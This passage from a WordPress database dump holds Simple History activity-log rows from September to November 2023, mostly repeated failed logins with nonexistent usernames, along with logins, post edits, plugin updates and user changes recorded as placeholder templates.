exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35133,'2023-09-23 12:58:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35134,'2023-09-23 21:11:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35135,'2023-09-24 02:05:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35136,'2023-09-24 02:22:33','SimpleUserLogger','info','Logged in','d074f1db491bfa8a5a96e665154fcba5','wp_user'),(35137,'2023-09-24 02:53:13','SimpleUserLogger','info','Logged in','20626dfef5e729b2def0a21ae1d571fb','wp_user'),(35138,'2023-09-24 03:01:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35139,'2023-09-24 03:12:37','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(35140,'2023-09-24 03:58:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35141,'2023-09-24 05:53:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35142,'2023-09-24 06:53:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35143,'2023-09-24 07:57:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35144,'2023-09-24 09:00:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35145,'2023-09-24 10:05:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35146,'2023-09-24 12:09:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35147,'2023-09-24 13:14:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35148,'2023-09-24 13:32:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35149,'2023-09-24 13:32:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35150,'2023-09-24 13:32:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35151,'2023-09-24 13:32:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35152,'2023-09-24 13:32:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35153,'2023-09-24 13:32:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35154,'2023-09-24 13:42:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35155,'2023-09-24 14:11:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35156,'2023-09-24 14:11:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35157,'2023-09-24 14:11:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35158,'2023-09-24 16:00:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(41234,'2023-11-21 16:48:20','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','20dfca4849132d99c518938a6fa859e0','wp_user'),(41235,'2023-11-21 16:49:23','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','20dfca4849132d99c518938a6fa859e0','wp_user'),(41233,'2023-11-21 16:48:13','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','97a8451fc99ae69c33808bf75ce17cdc','wp_user'),(41232,'2023-11-21 16:46:46','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','20dfca4849132d99c518938a6fa859e0','wp_user'),(41231,'2023-11-21 16:46:41','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','20dfca4849132d99c518938a6fa859e0','wp_user'),(41230,'2023-11-21 16:46:20','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','20dfca4849132d99c518938a6fa859e0','wp_user'),(41229,'2023-11-21 16:45:09','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','20dfca4849132d99c518938a6fa859e0','wp_user'),(41227,'2023-11-21 16:42:53','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','20dfca4849132d99c518938a6fa859e0','wp_user'),(41228,'2023-11-21 16:43:54','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','20dfca4849132d99c518938a6fa859e0','wp_user'),(41226,'2023-11-21 16:41:51','Plugin_DuplicatePost','info','Cloned \"{duplicated_post_title}\" to a new post','e3ae34b15d3b987869a85c7656f32f0e','wp_user'),(41225,'2023-11-21 16:41:51','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','20dfca4849132d99c518938a6fa859e0','wp_user'),(41224,'2023-11-21 16:40:17','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','b348eba7c503a9eeaed16211b89ab3c9','wp_user'),(41223,'2023-11-21 16:40:07','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','b348eba7c503a9eeaed16211b89ab3c9','wp_user'),(41221,'2023-11-21 16:38:48','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41222,'2023-11-21 16:39:23','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','b348eba7c503a9eeaed16211b89ab3c9','wp_user'),(41219,'2023-11-21 16:37:47','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','b348eba7c503a9eeaed16211b89ab3c9','wp_user'),(41220,'2023-11-21 16:38:04','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','b348eba7c503a9eeaed16211b89ab3c9','wp_user'),(41218,'2023-11-21 16:36:04','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','b348eba7c503a9eeaed16211b89ab3c9','wp_user'),(41217,'2023-11-21 16:35:57','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','b348eba7c503a9eeaed16211b89ab3c9','wp_user'),(41216,'2023-11-21 16:35:08','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','451ae239ad7e625e10f1d65b242c2c17','wp_user'),(41215,'2023-11-21 16:33:08','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','b348eba7c503a9eeaed16211b89ab3c9','wp_user'),(41214,'2023-11-21 16:31:53','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','b348eba7c503a9eeaed16211b89ab3c9','wp_user'),(41212,'2023-11-21 16:30:38','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','b348eba7c503a9eeaed16211b89ab3c9','wp_user'),(41213,'2023-11-21 16:31:13','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41211,'2023-11-21 16:29:35','Plugin_DuplicatePost','info','Cloned \"{duplicated_post_title}\" to a new post','e2dc64256665f8c530582eb65242dd63','wp_user'),(41210,'2023-11-21 16:29:35','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','b348eba7c503a9eeaed16211b89ab3c9','wp_user'),(41209,'2023-11-21 16:29:16','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41207,'2023-11-21 16:25:56','SimpleUserLogger','info','Logged in','6cfe89de80872fcb511ec767d68e445a','wp_user'),(41208,'2023-11-21 16:28:13','SimpleUserLogger','info','Logged in','34c34f0053849ae821e34551010dece8','wp_user'),(41206,'2023-11-21 09:51:23','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','b02fb74295eda428df37ba9ec4e2ba40','wp'),(41205,'2023-11-21 09:19:55','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','cc86fe926909d7d70131dfbbf78155c8','other'),(41204,'2023-11-20 21:15:00','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41203,'2023-11-20 21:01:42','SimpleThemeLogger','info','Customized theme appearance \"{setting_id}\"','5c459e011753e44b84c8b114a63cc9d1','wp_user'),(41202,'2023-11-20 21:01:42','SimpleThemeLogger','info','Customized theme appearance \"{setting_id}\"','4a62f2a4cae547d2d0958ec610afbfa6','wp_user'),(41201,'2023-11-20 21:01:42','SimpleThemeLogger','info','Customized theme appearance \"{setting_id}\"','8388ff67b80c5ddecefc8ac9e2e69d47','wp_user'),(41200,'2023-11-20 21:01:42','SimpleThemeLogger','info','Customized theme appearance \"{setting_id}\"','7a9c60c8808ffd46f9c44ab564f87568','wp_user'),(41198,'2023-11-20 20:50:45','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','a5eccf5d2fe2885151f60c4dcb8f9a48','wp_user'),(41199,'2023-11-20 20:55:01','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','a5eccf5d2fe2885151f60c4dcb8f9a48','wp_user'),(41197,'2023-11-20 20:33:00','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41196,'2023-11-20 20:32:38','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41195,'2023-11-20 20:28:09','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41194,'2023-11-20 20:27:46','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','7d6c69ee49e041bb87bba93de898dcec','wp_user'),(41193,'2023-11-20 20:26:51','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','aefd696612e378a6a2322e35c301cf6c','wp_user'),(41191,'2023-11-20 20:20:51','SimpleUserLogger','info','Logged in','6cfe89de80872fcb511ec767d68e445a','wp_user'),(41192,'2023-11-20 20:25:22','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','e91964dcda3eb2bc2f8d085ecfeb590a','wp_user'),(41190,'2023-11-19 20:55:44','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','109cbe75359c1ec8a8356d07c5c435d4','wp'),(41189,'2023-11-19 16:11:05','SimpleHistoryLogger','info','Removed {num_rows} events that were older than {days} days','3630d4a4e17fd18bd15f6907922b4eca','wp'),(34980,'2023-09-20 08:16:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34981,'2023-09-20 08:44:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34982,'2023-09-20 09:10:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34983,'2023-09-20 09:18:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34984,'2023-09-20 09:18:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34985,'2023-09-20 10:12:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34986,'2023-09-20 10:19:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34987,'2023-09-20 11:10:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34988,'2023-09-20 11:17:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34989,'2023-09-20 11:47:45','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','9e91b0318ea4c4e657765add7d3bc28c','wp'),(34990,'2023-09-20 12:09:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34991,'2023-09-20 13:09:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34992,'2023-09-20 13:17:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34993,'2023-09-20 14:12:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34994,'2023-09-20 14:20:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34995,'2023-09-20 15:13:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34996,'2023-09-20 15:20:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34997,'2023-09-20 17:04:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34998,'2023-09-20 17:21:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(34999,'2023-09-21 14:58:19','SimpleUserLogger','info','Logged in','ed4d6d72602b2a597b7f72e0f5f605e7','wp_user'),(35000,'2023-09-21 15:35:11','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','ff0e110c539eee68b8ee932b5a8fe593','other'),(35001,'2023-09-21 16:33:18','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','840913edce29c5010bc542787da8a050','wp_user'),(35002,'2023-09-21 16:33:41','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','12ff8b171fb718b382766e3b9813f120','wp_user'),(35003,'2023-09-21 16:34:15','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','7a4f3fdc605f5ef949a1012fefc97203','wp_user'),(35004,'2023-09-21 16:34:27','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','9a67a89d875ca5de69030ef386bbd353','wp_user'),(35005,'2023-09-21 16:34:35','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','c7b2663b8cd070d402f3b74f3f4619ee','wp_user'),(35006,'2023-09-21 17:29:51','SimplePluginLogger','info','Installed plugin \"{plugin_name}\"','2f93fabad89af8ec10852ed3b80bb0a0','wp_user'),(35007,'2023-09-21 17:30:05','SimplePluginLogger','info','Activated plugin \"{plugin_name}\"','df9c0b7a6b994370dd8ea2aa2915f2a7','wp_user'),(35008,'2023-09-21 18:32:01','SimpleUserLogger','info','Logged in','ed4d6d72602b2a597b7f72e0f5f605e7','wp_user'),(35009,'2023-09-21 18:40:05','SimpleUserLogger','info','Created user {created_user_login} ({created_user_email}) with role {created_user_role}','ad4f86f961b4ff6c94ce2732950c8364','wp_user'),(35010,'2023-09-21 18:41:48','SimpleUserLogger','info','Edited the profile for user \"{edited_user_login}\" ({edited_user_email})','ee1df8688a3d6c366dce4e08a7e2bc68','wp_user'),(35011,'2023-09-21 18:44:05','SimpleUserLogger','info','Edited the profile for user \"{edited_user_login}\" ({edited_user_email})','f3342a2ab18c1f8c8bd1d010ab6e3d4d','wp_user'),(35012,'2023-09-21 18:44:16','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','e0d4f6f3380f904fbef6a261e08ef36f','wp'),(35013,'2023-09-21 18:50:32','SimpleUserLogger','notice','Deleted user {deleted_user_login} ({deleted_user_email})','495b3e02f3c021a3c58bd491600dd9bf','wp_user'),(35014,'2023-09-21 19:16:08','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(35015,'2023-09-21 19:40:01','SimpleUserLogger','info','Logged in','20626dfef5e729b2def0a21ae1d571fb','wp_user'),(35016,'2023-09-21 19:55:30','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(35017,'2023-09-21 20:10:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35018,'2023-09-21 22:14:21','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','ea773b7ef0b57f8f06419bb1d37b077c','other'),(35019,'2023-09-21 22:27:29','SimpleUserLogger','info','Logged in','ed4d6d72602b2a597b7f72e0f5f605e7','wp_user'),(35020,'2023-09-21 22:42:02','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(35021,'2023-09-22 00:28:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35022,'2023-09-22 00:28:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35023,'2023-09-22 00:57:36','SimpleUserLogger','info','Logged in','42997591a77ebcfdc18fc4236acdb230','wp_user'),(35024,'2023-09-22 01:01:17','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','580a9f21f87cb57f6b70886e625c71d3','wp_user'),(35025,'2023-09-22 01:01:47','SimplePostLogger','info','Moved {post_type} \"{post_title}\" to the trash','9a47e5020534ea9449947834b1c4b136','wp_user'),(35026,'2023-09-22 01:02:13','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e62d17c24fe16c2ed7cb90ad898f955e','wp_user'),(35027,'2023-09-22 01:07:29','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e62d17c24fe16c2ed7cb90ad898f955e','wp_user'),(35028,'2023-09-22 01:09:55','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e62d17c24fe16c2ed7cb90ad898f955e','wp_user'),(35029,'2023-09-22 01:10:20','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e62d17c24fe16c2ed7cb90ad898f955e','wp_user'),(35030,'2023-09-22 01:11:22','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e41d0e20703873c33bf6ec585302c857','wp_user'),(35031,'2023-09-22 01:15:37','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e41d0e20703873c33bf6ec585302c857','wp_user'),(35032,'2023-09-22 01:19:00','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e41d0e20703873c33bf6ec585302c857','wp_user'),(35033,'2023-09-22 02:09:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35034,'2023-09-22 02:25:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35035,'2023-09-22 04:25:29','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','bc38446d152059aa3e47f11cf57c4f33','wp_user'),(35036,'2023-09-22 04:26:31','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','bc38446d152059aa3e47f11cf57c4f33','wp_user'),(35037,'2023-09-22 04:27:46','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','bc38446d152059aa3e47f11cf57c4f33','wp_user'),(35038,'2023-09-22 04:28:47','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','bc38446d152059aa3e47f11cf57c4f33','wp_user'),(35039,'2023-09-22 04:30:02','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','bc38446d152059aa3e47f11cf57c4f33','wp_user'),(35040,'2023-09-22 04:31:48','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','35dce57aa213acca97a9d08c744f15c8','wp_user'),(35041,'2023-09-22 04:32:26','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','bc38446d152059aa3e47f11cf57c4f33','wp_user'),(35042,'2023-09-22 04:33:19','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','bc38446d152059aa3e47f11cf57c4f33','wp_user'),(35043,'2023-09-22 13:48:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35044,'2023-09-22 14:35:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35045,'2023-09-22 15:34:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35046,'2023-09-22 16:32:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35047,'2023-09-22 16:33:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35048,'2023-09-22 16:44:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35049,'2023-09-22 16:55:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35050,'2023-09-22 17:06:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35051,'2023-09-22 17:18:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35052,'2023-09-22 17:29:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35053,'2023-09-22 17:30:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35054,'2023-09-22 17:41:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35055,'2023-09-22 17:52:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35056,'2023-09-22 18:04:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35057,'2023-09-22 18:15:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35058,'2023-09-22 18:26:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35059,'2023-09-22 18:35:38','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c885d58b6c7a1659b771336849b015f9','other'),(35060,'2023-09-22 18:38:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35061,'2023-09-22 18:49:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35062,'2023-09-22 19:01:12','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35063,'2023-09-22 19:12:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35064,'2023-09-22 19:24:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35065,'2023-09-22 19:35:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35066,'2023-09-22 19:47:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39969,'2023-10-26 12:23:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39970,'2023-10-26 12:32:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39971,'2023-10-26 12:36:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39972,'2023-10-26 12:45:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39973,'2023-10-26 12:47:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39974,'2023-10-26 12:51:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39975,'2023-10-26 13:06:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39976,'2023-10-26 13:10:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39977,'2023-10-26 13:18:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39978,'2023-10-26 13:28:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39979,'2023-10-26 13:29:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39980,'2023-10-26 13:48:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39981,'2023-10-26 13:50:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39982,'2023-10-26 14:00:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39983,'2023-10-26 14:07:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39984,'2023-10-26 14:12:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39985,'2023-10-26 14:27:12','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39986,'2023-10-26 14:35:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39987,'2023-10-26 14:43:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39988,'2023-10-26 14:46:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39989,'2023-10-26 14:57:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39990,'2023-10-26 15:06:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39991,'2023-10-26 15:20:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39992,'2023-10-26 15:25:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39993,'2023-10-26 15:43:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39994,'2023-10-26 15:45:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39995,'2023-10-26 16:04:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39996,'2023-10-26 